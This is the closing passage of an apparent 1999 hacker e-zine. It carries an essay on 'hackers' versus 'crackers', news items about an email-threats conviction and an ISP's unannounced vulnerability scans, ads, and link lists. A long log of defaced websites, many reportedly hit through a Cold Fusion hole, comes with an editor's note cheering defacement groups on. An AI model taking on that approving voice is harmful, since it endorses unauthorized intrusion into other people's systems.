with an axe. These days a hacker can be described as a very capable
programmer, or a person who enjoys exploring the details of programmable
systems. Someone might think you are a hacker if you spend hours and
hours figuring out how your computer system works and developing cool
applications (called "hacks") that perform some useful function. In short,
the computer industry needs more and more hackers in order to advance
technology and solve current problems.
Media Misnomer Being a hacker does not mean you spend your time breaking
into computers. We can blame the journalistic community for grabbing hold
of what it perceived as a catchall term and deprecating the true meaning
of the word. The correct way to describe someone who circumvents computer
security is a system "cracker." These malcontents are well known for
breaking into the Pentagon, several defense contractors, various ISPs, and
other supposedly secure systems. They have shared classified documents on
the Net, given copy-protected software away, stolen credit card
information and, in the process, made the online community nervous. Most
of the system crackers I know are either in jail, have been in jail or are
going to jail.
When Hackers Grow Up
The hacker population will probably rise at the same rate as every other
profession, so a per-capita increase seems unlikely. The media might have
us believe otherwise, since even the least-newsworthy computer "hackers"
get tons of television exposure. If you want to join the elite group of
technophiles, there is no time like to present to start working on your
craft.
"Didn't you used to be a hacker before you were a geek?"; the wife
asks. "And what's the difference anyway?"
I'm not paying attention. Instead I'm looking at how I can replicate
the inode dataset on a ufs partition to an NTFS volume.
"Never mind," she sighs, "I just figured that one out on my own."
Jack Valko is the senior network manager for Buena Vista Internet Group,
which produces ABCNEWS.com.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
53.0 [ISN] Email threats could bring 10yr jail term
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek milewski <darekm@cmeasures.com>
http://www.news.com/News/Item/0,4,35560,00.html
Email threats earn conviction
By Dan Goodin
Staff Writer, CNET News.com
April 22, 1999, 6:45 p.m. PT
A Canadian man is facing up to 10 years in federal prison after being
found guilty of sending threatening emails to Microsoft chief executive
Bill Gates and a number of government officials, the U.S. attorney in
Seattle said.
Carl Edward Johnson, 49, of Bienfait, Saskatchewan, was convicted on
four felony counts in connection with the threats, some of which were
posted to a popular encryption mailing list using software that hides the
identity of the sender. His conviction wraps up a two-year investigation
by officials from the Treasury Department.
Johnson, who is scheduled for sentencing on June 11, is being held in
a federal detention center near Seattle. His attorney was not immediately
available for comment.
U.S. District Judge Robert Bryan found Johnson guilty of using the
Cypherpunks mailing list to threaten government officials, said assistant
U.S. attorney Floyd Short. The court found that Johnson in June of 1997
used an anonymous remailer to post a message offering a reward if someone
would kill a magistrate judge and several Treasury Department
investigators. The officials were involved in the criminal prosecution of
a man accused of illegally compiling names and addresses of employees at
the Internal Revenue Service and trying them in so-called common law
courts.
The court also found that Johnson posted messages threatening the
lives of three federal appeals court judges who are hearing a case
challenging government restrictions of the export of encryption software.
Johnson said the judges would end up in "a pine box or a body bag" if they
ruled against Chicago professor Daniel Bernstein, a plaintiff in the civil
case against the regulations, Short said.
Johnson also was convicted of sending email to Gates claiming the top
Microsoft executive's assassination was being planned.
Floyd said that investigators were able to learn Johnson's identity
by piecing together information he left on Web sites, in email messages,
and in his home. Interestingly, a key piece of evidence included what is
known as the public key in a program called Pretty Good Privacy, which is
designed to conceal a computer user's identity.
Johnson's conviction comes a week after federal investigators were
able to track down the man they allege anonymously posted a hoax news
story that caused the stock of a California company to rise more than 30
percent.
"People may feel they are anonymous on the Internet, and that's not
the case," Short said. "The level of understanding of the Internet is
rising quite a bit within law enforcement."
@HWA
54.0 [ISN] Singapore ISP scans customer computers for vulnerabilities
http://straitstimes.asia1.com/one1/one1.html
SINGAPORE (April 29, 1999 11:53 p.m. EDT http://www.nandotimes.com) -
Singapore's national telecommunications company has scanned more than
200,000 computers of its Internet customers without their knowledge as
part of a plan to ward off hackers, the Straits Times reported on Friday.
Singapore Telecom, which is 80 percent owned by the government, began the
scan last month of nearly half of Singapore's Internet users to check
whether its customers were vulnerable to hacker attacks, the report said.
The scanning would continue until all accounts of its SingNet and SingTel
Magix customers were covered, it said.
"We are merely protecting the interest of our customers," the report
quoted Singapore Telecom chief executive officer for multimedia Paul Chong
as saying.
SingNet had asked the Home Affairs Ministry's IT security unit to do the
scan following news in March of the arrest of two boys who had hacked into
17 SingNet customers' accounts.
Officials at Singapore Telecom were not immediately available for comment.
The disclosure from Chong came after the Straits Times reported on
Thursday that 21-year-old law student Anne Lee had complained to the
police that someone with an account in the Home Affairs Ministry had
hacked into her account.
Chong said SingTel was being "responsible" by giving customers the
"value-added service" of scanning their computers.
On whether the law allowed such scanning without customers' consent, Chong
said nothing illegal had taken place.
He said customers were not informed of the scan so as not to alarm them.
"We do not want to make a mountain out of a molehill. In the end, the scan
might not turn up anything. If we had informed the customers, it might
cause an alarm," Chong said.
He added that "real hackers might lie low" if they knew of the scan.
Chong was quoted as saying the scanning so far showed that some users were
vulnerable and that they would be informed when the process was over.
The Home Ministry was approached because it was the "expert" in the area
-- it helped crack the case of the two teenage hackers.
Chong stressed that the scan did not delve into users' computer databases,
or amount to an illegal entry into computer accounts, the Straits Times
reported.
"There is no invasion of privacy at all. Basically, what we did was check
if the systems had open windows through which hackers can exploit," Chong
said.
Chang Wai Leong, a SingTel director, was quoted in the report as
describing the scan as like a "policeman patrolling in cyberspace checking
if the "windows" of the computer system are opened."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
@HWA
HOW.TO How to hack part 3
~~~~~~~~~~~~~~~~~~
To be continued (probably) in a future issue... if time permits
and inclination is prevelant. ie: if & when I feel like it.. :p
(discontinued until further notice)
Meanwhile read this:
http://www.nmrc.org/faqs/hackfaq/hackfaq.html
<a href="http://www.nmrc.org/faqs/hackfaq/hackfaq.html">Link</a>
And especially, this:
http://www.tuxedo.org/~esr/faqs/hacker-howto.html
<a href="http://www.tuxedo.org/~esr/faqs/hacker-howto.html">Link</a>
(published in its entirety in issue #12)
@HWA
SITE.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
H.W Hacked websites
~~~~~~~~~~~~~~~~
Note: The hacked site reports stay, especially with some cool hits by
groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
* Hackers Against Racist Propaganda (See issue #7)
Haven't heard from Catharsys in a while for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
April 25th
From http://www.403-security.org/
3 sites got hacked by Moscow Security Team
Astral 25.04.1999 12:25
Today Moscow Security Team hacked 3 sites : lica.co.uk, fdfoto.com, tri-starmall.com. All sites had
same hacked index.htm and text on hacked sites were same :" I want to say: admin's of this site is very
lame!!!! This can't protect their site!Privet to all haX0rs grups from Russia, Moscow!:)) ". Archive of hack.
April 26th
From HNN rumours section;
contributed by Anonymous
Cracked
Cold Fusion is working its magic. Many of these sites
where recently reported cracked because of the hole in
Cold Fusion. Many have been done by group known as
Forpaxe. We are listing almost all of the reported sites
today just to show how widespread this problem is.
http://thresher1.gsfc.nasa.gov
http://www.bestmidwestmall.com
http://advances.com
http://www.bellanet.com
http://www.state.wv.us
http://www.ewic.org.uk
http://www.store.net
http://www.bankerusa.com
http://www.cleanteam.com
http://www.actcomm.com
http://www.pictureshow.com
http://www.mallworld.com/
http://www.huang.com/
http://www.digital2000.com/
http://www.autoshow.com/
http://www.usautoparts.com/
http://www.nationwidetrading.com/
http://www.jaamejam.com/
http://www.spiffest.com
http://www.pacificshorehotel.com/
http://www.thebeachsuites.com
http://www.tvbusa.com/
http://www.hotelcarmel.com
http://www.snakclub.com/
http://www.georgianhotel.com/
http://www.wwwonders.com/
http://ns1.wing.net
http://www.schoollink.net
http://geonorth.com
http://nmc.itc.virginia.edu/
http://orbit.unh.edu
http://www.ewic.org.uk
http://www.utrecht.nl
http://cddocs.fnal.gov
http://www.ultralert.com
http://www.sellnet.com.au
http://download.throbnet.com
http://www.athi.com.au
http://www.budgettravel.to
http://www.cargohold.com.au
http://www.councilexghanges.org.au
http://www.ellamaiden.com
http://www.howtoget.to
http://www.ibaustralia.com
http://www.interlink.asn.au
http://www.juster.com.au
http://www.motorart.com
http://www.offyourhead.com.au
http://www.siberiankitty.com
http://www.bicafe.com
http://www.nymfoseek.com
http://www.tucsonfiestabowl.com
http://www.game-online.com
http://www.giftedpeople.com/
http://www.braingate.com
http://www.state.co.us
http://mot.vuse.vanderbilt.edu
http://www.muchmusic.com
http://www.edunet.com
http://www.exn.ca
April 27th
contributed by Anonymous
Cracked
Cold Fusion sites are still being hit. Most of todays sites
are a result of the recently released Cold Fusion
problem. If you haven't patched your system yet you
better do so soon.
http://teamweb3.lbl.gov
http://herbb.hanscom.af.mil/index.htm
http://www.adultseek.net
http://www.vrgirls.com
http://www.vrsluts.com
http://www.towngreen.com
http://www.exn.ca
http://www.eaglebaytrading.com/
http://tri-starmall.com/
http://lica.co.uk/
http://fdfoto.com/
http://owk.nvart.ru/
http://www.cide.mx
http://www.state.id.us
http://www.diamondmm.com
http://www.state.sd.us
http://www.mwm.net
http://www.mwm.net/
http://www.adultkey.com/
http://www.1wrestling.com
http://www.3m.com
http://www.tay.ac.uk
April 28th
http://thayerstreet.org
http://jopa.hypermart.net/
http://www.ci.la.ca.us
http://www.parctechno.qc.ca/
http://ois.nist.gov/index.html
http://www.parctechno.qc.ca
April 29th
Via HNN rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
Admins have still not patched their Cold Fusuion sites.
Many of these reported cracks are a result of that hole.
http://www.ezcd.com
http://www.itar-tass.com
http://xre22.brooks.af.mil
http://www.powermanager.com
http://www.leg.state.fl.us
http://www.wcresa.k12.mi.us
http://www.users.sccoast.net
http://www.adult.ru
http://ois.nist.gov
http://www.airbed.com
http://www.houseit.com
http://www.hrsa.dhhs.gov
http://www.parctechno.qc.ca
http://www.roc.ru
http://www.thayerstreet.org
http://fa.havengames.net
http://los.extremeblizzard.com
http://wn.havengames.net
http://miraesoft.ugn3d.com
http://haven.extremeblizzard.com
http://www.computer-solutions.net
http://tgrc.ucdavis.edu/
April 30th
From HNN rumours section
contributed by Anonymous
Cracked
The following sites have been reported as cracked.
http://kenlince.dynip.com
http://this.gsfc.nasa.gov
http://www.academic.marist.edu
http://www.dos.gov.jo
http://www.secure-service.org
http://www.totalimageprinting.com
http://www.faa.gov - "Kosovo - stop the war" archived at http://www.403-security.org/Archive/Sploit/www.faa.gov.htm
http://www.recreation.gov
http://ns1.rrsan.com
http://hunain.fkm.utm.my
http://los.extremeblizzard.com
http://www.computer-solutions.net
http://newsnet.byu.edu
http://mama.uchsc.edu
http://www.cabp.com
http://www.brain3.com
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
<a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
<a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
<a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
Mirror sites:
~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://bewoner.dma.be/cum/ <a href="http://bewoner.dma.be/cum/">Go there</a>
Brasil........: http://www.psynet.net/ka0z <a href="http://www.psynet.net/ka0z/">Go there</a>
http://www.elementais.cjb.net <a href="http://www.elementais.cjb.net/">Go there</a>
Columbia......: http://www.cascabel.8m.com <a href="http://www.cascabel.8m.com/">Go there</a>
http://www.intrusos.cjb.net <a href="http://www.intrusos.cjb.net">Go there</a>
Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
http://members.xoom.com/neblonica/ <a href="http://members.xoom.com/neblonica/">Go there</a>
http://hackerlink.or.id/ <a href="http://hackerlink.or.id/">Go there</a>
Netherlands...: http://security.pine.nl/ <a href="http://security.pine.nl/">Go there</a>
Russia........: http://www.tsu.ru/~eugene/ <a href="http://www.tsu.ru/~eugene/">Go there</a>
Singapore.....: http://www.icepoint.com <a href="http://www.icepoint.com">Go there</a>
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]